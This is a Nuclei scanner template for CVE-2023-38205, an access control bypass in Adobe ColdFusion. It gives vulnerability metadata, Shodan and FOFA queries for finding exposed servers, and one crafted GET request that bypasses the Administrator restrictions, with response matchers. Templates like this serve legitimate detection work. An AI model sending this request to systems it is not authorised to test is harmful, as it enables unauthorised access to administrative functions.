nuclei-templates/http/cves/2023/CVE-2023-38205.yaml

52 lines
2.2 KiB
YAML

id: CVE-2023-38205
info:
name: Adobe ColdFusion - Access Control Bypass
author: DhiyaneshDk
severity: high
description: |
There is an access control bypass vulnerability in Adobe ColdFusion versions 2023 Update 2 and below, 2021 Update 8 and below and 2018 update 18 and below, which allows a remote attacker to bypass the ColdFusion mechanisms that restrict unauthenticated external access to ColdFusion's Administrator.
impact: |
Successful exploitation of this vulnerability could allow an attacker to bypass access controls and gain unauthorized access to sensitive information or perform unauthorized actions.
remediation: |
Apply the necessary security patches or updates provided by Adobe to mitigate this vulnerability.
reference:
- https://www.rapid7.com/blog/post/2023/07/19/cve-2023-38205-adobe-coldfusion-access-control-bypass-fixed/
- https://helpx.adobe.com/security/products/coldfusion/apsb23-47.html
- https://github.com/Ostorlab/KEV
- https://github.com/Ostorlab/known_exploited_vulnerbilities_detectors
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-38205
cwe-id: CWE-284,NVD-CWE-Other
epss-score: 0.93471
epss-percentile: 0.99038
cpe: cpe:2.3:a:adobe:coldfusion:2018:-:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: adobe
product: coldfusion
shodan-query: http.component:"Adobe ColdFusion"
fofa-query: app="Adobe-ColdFusion"
tags: cve2023,cve,adobe,auth-bypass,coldfusion,kev
http:
- method: GET
path:
- "{{BaseURL}}/hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx"
matchers-condition: and
matchers:
- type: regex
regex:
- ([0-9a-fA-F]{32},){2}[0-9a-fA-F]{32}
- type: dsl
dsl:
- contains(content_type, "text/html")
- status_code == 200
- len(trim_space(body)) == 106
condition: and
# digest: 4a0a0047304502205cbd4741c39b434b88ef3ead02c752251f95bf6dbe8e8059662e92b90897689c022100aa8aa8154750e2e1b81cb66889cde57d1d2d25176d58af0f8f59219999b364f3:922c64590222798bb761d5b6d8e72950